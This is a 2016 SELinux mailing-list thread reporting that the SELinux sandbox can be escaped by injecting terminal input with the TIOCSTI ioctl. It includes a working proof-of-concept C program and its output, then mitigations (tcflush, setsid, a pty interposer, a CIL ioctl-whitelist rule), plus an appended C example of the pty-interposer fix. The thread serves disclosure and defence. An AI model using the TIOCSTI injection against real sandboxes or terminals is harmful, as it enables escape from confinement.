On 09/23/2016 09:38 AM, Stephen Smalley wrote:
> On 09/23/2016 09:28 AM, Paul Moore wrote:
>> On Fri, Sep 23, 2016 at 5:23 AM, <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
>>> Hi,
>>>
>>> When executing a program via the SELinux sandbox, the nonpriv session can
>>> escape to the parent session by using the TIOCSTI ioctl to push characters
>>> into the terminal's input buffer, allowing an attacker to escape the
>>> sandbox.
>>>
>>> $ cat test.c
>>> #include <unistd.h>
>>> #include <sys/ioctl.h>
>>>
>>> int main()
>>> {
>>>     char *cmd = "id\n";
>>>     while(*cmd)
>>>         ioctl(0, TIOCSTI, cmd++);
>>>     execlp("/bin/id", "id", NULL);
>>> }
>>>
>>> $ gcc test.c -o test
>>> $ /bin/sandbox ./test
>>> id
>>> uid=1000 gid=1000 groups=1000
>>> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
>>> $ id <------ did not type this
>>> uid=1000(saken) gid=1000(saken) groups=1000(saken)
>>> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>>
>> I've only just started looking at this, but it seems like we need a
>> call to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after
>> the sandboxed process exits.  Do any of the userspace tools guys have
>> any other ideas?
>
> Normally this is handled via setsid() or via a pty interposer.
> seunshare does call setsid(), so I believe that sandbox -X or -M are not
> susceptible to this, but sandbox without those options does not use
> seunshare.  run_init for example uses a pty interposer.  Another
> alternative would be to use the ioctl whitelisting support added by
> Android to block use of TIOCSTI by the sandbox domains, but it is
> unclear if that is sufficient.
So, for example, to block this via ioctl whitelisting, on a system whose
checkpolicy and kernel support policy version 30, I can do this:

$ cat sandbox_tiocsti.cil
(allowx sandbox_domain ptynode (ioctl chr_file (not (0x5412))))
$ sudo semodule -i sandbox_tiocsti.cil
$ sandbox ./test
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c466,c667

(note that we do not get the second output from the parent, and this
output was run in the context of the sandbox domain)

And we get the following AVC from the kernel:

type=AVC msg=audit(1474638454.617:6045): avc:  denied  { ioctl } for  pid=2935 comm="test" path="/dev/pts/0" dev="devpts" ino=3 ioctlcmd=5412 scontext=unconfined_u:unconfined_r:sandbox_t:s0:c72,c552 tcontext=unconfined_u:object_r:user_devpts_t:s0 tclass=chr_file permissive=0

_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx
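The setsid() plus pty interposer mitigation Stephen describes, with Paul's tcflush() as a second line of defence, as an added example that is not part of this thread and is not code from sandbox, seunshare or run_init. It assumes Linux with glibc. untrusted_child() stands in for the reporter's ./test: it injects "id\n" with TIOCSTI and then reports where the bytes went. run_isolated() gives the child a fresh pseudo-terminal in its own session, so the injected bytes can only land in the child's own pty input queue, never in the parent's terminal. The outcome names (CONTAINED, REFUSED, SETUP_FAILED) are this example's own. On kernels from 6.2 onwards TIOCSTI may be disabled outright (dev.tty.legacy_tiocsti=0), and an SELinux ioctl whitelist like the CIL rule above denies it too; both show up as the REFUSED outcome.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

/* Outcomes of run_isolated() (names are this example's own). */
enum { CONTAINED = 0, REFUSED = 1, SETUP_FAILED = -1 };

static void say(const char *s, size_t n)
{
    if (write(STDOUT_FILENO, s, n) != (ssize_t)n) _exit(1);
}

/*
 * Stand-in for the reporter's ./test: push "id\n" into the tty on stdin
 * with TIOCSTI, then report where the bytes went. It runs on a pty slave
 * owned by its own session, so the only reader of that queue is itself.
 */
static void untrusted_child(void)
{
    struct termios t;
    if (tcgetattr(STDIN_FILENO, &t) == 0) {
        t.c_lflag &= ~ECHO;    /* don't echo the injected bytes to the master */
        t.c_oflag &= ~OPOST;   /* and don't turn our "\n" into "\r\n" */
        tcsetattr(STDIN_FILENO, TCSANOW, &t);
    }
    for (const char *p = "id\n"; *p; p++) {
        if (ioctl(STDIN_FILENO, TIOCSTI, p) == -1) {
            /* EIO: kernel has TIOCSTI disabled (dev.tty.legacy_tiocsti=0).
               EACCES/EPERM: SELinux ioctl whitelist or the controlling-tty
               check. Either way nothing was injected. */
            say("REFUSED\n", 8);
            _exit(0);
        }
    }
    /* Canonical mode: this read returns the whole injected line "id\n". */
    char buf[32];
    ssize_t n = read(STDIN_FILENO, buf, sizeof buf - 1);
    char out[64];
    int len = snprintf(out, sizeof out, "INJECTED:%.*s", (int)(n > 0 ? n : 0), buf);
    say(out, (size_t)len);
    _exit(0);
}

/*
 * Run child() on a fresh pseudo-terminal in a new session (the pty
 * interposer pattern) and capture what it writes there into out. A full
 * interposer such as run_init's would also relay bytes between the user's
 * terminal and the pty master; capturing is enough to show that TIOCSTI
 * from the child cannot reach the parent's terminal.
 */
static int run_isolated(void (*child)(void), char *out, size_t outsz)
{
    out[0] = '\0';
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master == -1 || grantpt(master) == -1 || unlockpt(master) == -1)
        return SETUP_FAILED;
    const char *name = ptsname(master);
    int slave = name ? open(name, O_RDWR | O_NOCTTY) : -1;
    if (slave == -1) { close(master); return SETUP_FAILED; }

    pid_t pid = fork();
    if (pid == -1) { close(master); close(slave); return SETUP_FAILED; }
    if (pid == 0) {
        /* New session: drops the parent's controlling terminal (what
           seunshare's setsid() buys), then adopt the pty slave as the
           controlling terminal of that new session. */
        if (setsid() == -1 || ioctl(slave, TIOCSCTTY, 0) == -1)
            _exit(127);
        dup2(slave, STDIN_FILENO);
        dup2(slave, STDOUT_FILENO);
        dup2(slave, STDERR_FILENO);
        if (slave > STDERR_FILENO) close(slave);
        close(master);
        child();
        _exit(0);
    }
    close(slave);   /* only the child holds the slave side now */

    size_t used = 0;
    for (;;) {
        ssize_t n = read(master, out + used, outsz - 1 - used);
        if (n <= 0) break;   /* EIO once the child closed its last slave fd */
        used += (size_t)n;
        if (used == outsz - 1) break;
    }
    out[used] = '\0';
    close(master);

    int status = 0;
    waitpid(pid, &status, 0);

    /* Paul's tcflush() idea: discard anything queued on our own terminal's
       input before control returns to the interactive shell. */
    if (isatty(STDIN_FILENO))
        tcflush(STDIN_FILENO, TCIFLUSH);

    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return SETUP_FAILED;
    return strncmp(out, "REFUSED", 7) == 0 ? REFUSED : CONTAINED;
}

int main(void)
{
    char out[256];
    int r = run_isolated(untrusted_child, out, sizeof out);
    printf("outcome=%d, child wrote: %s", r, out);
    return r == SETUP_FAILED;
}
```

Run it from an interactive shell: whatever the child injects, nothing appears at your prompt afterwards, because the child's controlling terminal is the throwaway pty, not yours. Drop the setsid()/TIOCSCTTY step and share the parent's stdin instead, and you are back to the reporter's escape.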